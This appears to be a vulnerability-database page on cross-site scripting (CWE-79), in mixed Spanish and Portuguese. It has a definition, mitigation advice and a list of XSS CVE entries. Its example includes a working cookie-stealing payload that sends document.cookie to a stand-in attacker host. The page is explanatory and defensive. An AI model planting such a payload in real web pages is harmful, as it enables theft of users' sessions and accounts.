Fallos del tipo CWE-79

28.989 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2025-26210HIGHDeepSeek R1 through V3.1 allows XSS, as demonstrated by JavaScript execution in the context of the run-html-chat.deepseeksvc.com domain. NOTEPSS 0.6%CVE-2023-33962MEDIUMJStachio XSS vulnerability: Unescaped single quotesEPSS 0.6%CVE-2014-125035LOWJobs-Plugin cross site scriptingEPSS 0.6%CVE-2023-6767MEDIUMSourceCodester Wedding Guest e-Book add-guest.php cross site scriptingEPSS 0.6%CVE-2024-10177MEDIUMBeds24 Online Booking <= 2.0.27 - Authenticated (Contributor+) Stored Cross-Site Scripting via beds24-link ShortcodeEPSS 0.6%CVE-2023-27130MEDIUMCross Site Scripting vulnerability found in Typecho v.1.2.0 allows a remote attacker to execute arbitrary code via an arbitrarily supplied UEPSS 0.6%CVE-2024-25868MEDIUMA Cross Site Scripting (XSS) vulnerability in CodeAstro Membership Management System in PHP v.1.0 allows a remote attacker to execute arbitrEPSS 0.6%CVE-2024-8174MEDIUMcode-projects Blood Bank System Login Page login.php cross site scriptingEPSS 0.6%CVE-2024-8604MEDIUMSourceCodester Online Food Ordering System Create an Account Page index.php cross site scriptingEPSS 0.6%CVE-2024-1020LOWRebuild proxy-download getStorageFile cross site scriptingEPSS 0.6%CVE-2026-52854HIGHmediawiki/maps: Stored XSS through the overlays parameter in the display_map parser functionEPSS 0.6%CVE-2026-55087MEDIUMEtherpad: x-proxy-path header reflected into admin HTML/JS/CSS (cache-poisoning XSS) and concatenated into redirect (open-redirect)EPSS 0.6%CVE-2023-37280MEDIUMPimcore admin UI vulnerable to Cross-site Scripting in two factor authentication setup pageEPSS 0.6%CVE-2025-46719MEDIUMOpen WebUI vulnerable to stored XSS via unescaped markdown token in MarkdownTokens.svelte leading to full account takeover and RCE via functionsEPSS 0.6%CVE-2021-3619LOWRapid7 Velociraptor Notebooks Authenticated Persistent XSSEPSS 0.6%CVE-2022-44279MEDIUMGarage Management System v1.0 is vulnerable to Cross Site Scripting (XSS) via /garage/php_action/createBrand.php.EPSS 0.6%CVE-2022-32225—A reflected DOM-Based XSS vulnerability has been discovered in the Help directory of Veeam Management Pack for Microsoft System Center 8.0. EPSS 0.6%CVE-2023-1418LOWSourceCodester Friendly Island Pizza Website and Ordering System POST Parameter cashconfirm.php cross site scriptingEPSS 0.6%CVE-2024-13722MEDIUMCheckmk NagVis Reflected Cross-site ScriptingEPSS 0.6%CVE-2024-4519LOWCampcodes Complete Web-Based School Management System teacher_salary_details3.php cross site scriptingEPSS 0.6%